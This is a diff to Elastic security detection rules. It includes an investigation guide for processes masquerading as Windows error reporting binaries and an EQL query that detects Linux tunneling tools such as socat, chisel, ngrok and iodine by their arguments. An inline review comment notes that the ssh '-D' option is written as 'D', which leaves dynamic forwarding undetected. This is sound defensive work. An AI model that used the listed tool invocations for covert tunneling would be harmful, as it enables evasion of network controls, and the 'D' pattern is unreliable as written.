Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n",
 "references": [
 "https://twitter.com/SBousseaden/status/1235533224337641473",
@@ -93,7 +93,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json
index c5461dfe571..8b68eb3bf4f 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json
index 4033e027a2b..7e4c34cf7e7 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json
index fcf242aa12f..8343d47337c 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json
index 0ba525a93bf..d10beca8c62 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json
index 6041ca0f00b..f0151a07802 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json
index 9953283c588..d9733bb8293 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json
index f24c3e2e60f..0f49a15e396 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Tunneling and/or Port Forwarding", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n// gost \u0026 pivotnacci - spawned without process.parent.name\n(process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n// ssh\n(process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count \u003e= 4)) or\n// sshuttle\n(process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count \u003e= 4) or\n// socat\n(process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count \u003e= 3) or\n// chisel\n(process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n// iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy \u0026 ngrok \n(process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n// gost & pivotnacci - spawned without process.parent.name\n(process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n// ssh\n(process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4)) or\n// sshuttle\n(process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n// socat\n(process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n// chisel\n(process.name : \"chisel*\" and process.args in 
(\"client\", \"server\")) or\n// iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n(process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json index febc75dd6da..fc93c65df9b 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json 
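Review bot: The ssh branch of the new-side query compares `process.args in ("-R", "-L", "D", "-w")`, and the bare `"D"` looks like it is missing its leading hyphen: `in` is an exact-value match, so an invocation using ssh's `-D` dynamic-forwarding option never satisfies this rule even though dynamic port forwarding is squarely what "Potential Linux Tunneling and/or Port Forwarding" is meant to surface. The same list appears unchanged in the `_2.json` and `_3.json` hunks that follow, so the gap is present in every published version of this rule. This commit only re-serializes `\u0026` and `\u003e`, so the fix does not belong here; if the JSON is generated from the TOML rule source, the correction should be made there and released as a new rule version rather than by editing these versioned snapshots, with the changed fragment being `process.args in ("-R", "-L", "-D", "-w")`.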
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Tunneling and/or Port Forwarding", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost \u0026 pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count \u003e= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count \u003e= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count \u003e= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy \u0026 ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and 
process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json index 28ad8f2c8e4..9e182639948 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Tunneling and/or Port Forwarding", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost \u0026 pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count \u003e= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count \u003e= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count \u003e= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy \u0026 ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and 
process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json index ab852ae86e4..048e4b97e05 100644 --- a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json index c56c368f1ef..1e0e4366ff6 100644 --- a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json +++ b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json 
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json
index e0ac47ad6ac..424dd774aeb 100644
--- a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json
index 5718d89b72e..309d1f015fd 100644
--- a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json
index e2ffbc407ed..ff15ccca964 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json
index c7a570ea83b..e01a087b321 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json
index 89e00fe2a4e..adcb0c7b59d 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json
index dea0cc3da4e..cd73bf1e993 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json
index 5bd81b5630b..1357506f143 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
